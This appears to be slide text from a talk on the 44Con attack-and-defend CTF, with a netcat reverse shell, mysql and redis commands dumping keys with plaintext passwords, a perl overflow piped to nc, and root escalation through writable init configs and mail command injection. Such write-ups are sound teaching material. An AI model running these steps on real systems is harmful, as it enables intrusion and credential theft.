The document summarizes the author's experience playing a capture the flag (CTF) competition called the 44Con CTF. It describes recon activities like scanning services to identify vulnerabilities. Several services are found to have exploitable issues, including a pastie service with SQL injection, a mail server with remote code execution, and an authentication service with a stack buffer overflow. The author is able to exploit these issues to steal flags, gain a remote shell, and eventually escalate privileges to root through service restart hijacking and a mail service vulnerability. Overall it provides a play-by-play of the reconnaissance and exploitation steps taken during the CTF.
7. 44CON CTF - What we got
Virtual Machine image
IP Address
Scope of "attackable" machines
8. Attack & Defend
Kind of like a pentest
(maybe, I've never done a pentest)
I have a plan:
Recon
Harden
Write exploits
Run riot
Get the girl
Save the world
9. Step 1 - Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers
12. Recon - Scoring
Regular "scoring rounds"
Score server stores new keys in services
Score server checks for previous keys?
Every 30 minutes
Not great if you're trying to see talks!
50. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
Now we can have some fun!
52. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e "select
status from statuses order by created_at desc limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e "select
pastie from pastie order by date desc limit 1;"
OUTPUT=redis-cli -r 1 keys * | tail -n 1
redis-cli -r 1 lrange $OUTPUT 0 1
53. Leave a calling card
echo 'Look behind you! A three-headed monkey!' >
/services/pastie/.win
57. Escalation - the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf
58. Escalation - the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth
59. Escalation - the hard way
Next time auth respawns we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*] accepted
# whoami
root
60. Escalation - the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, `whoami`)
root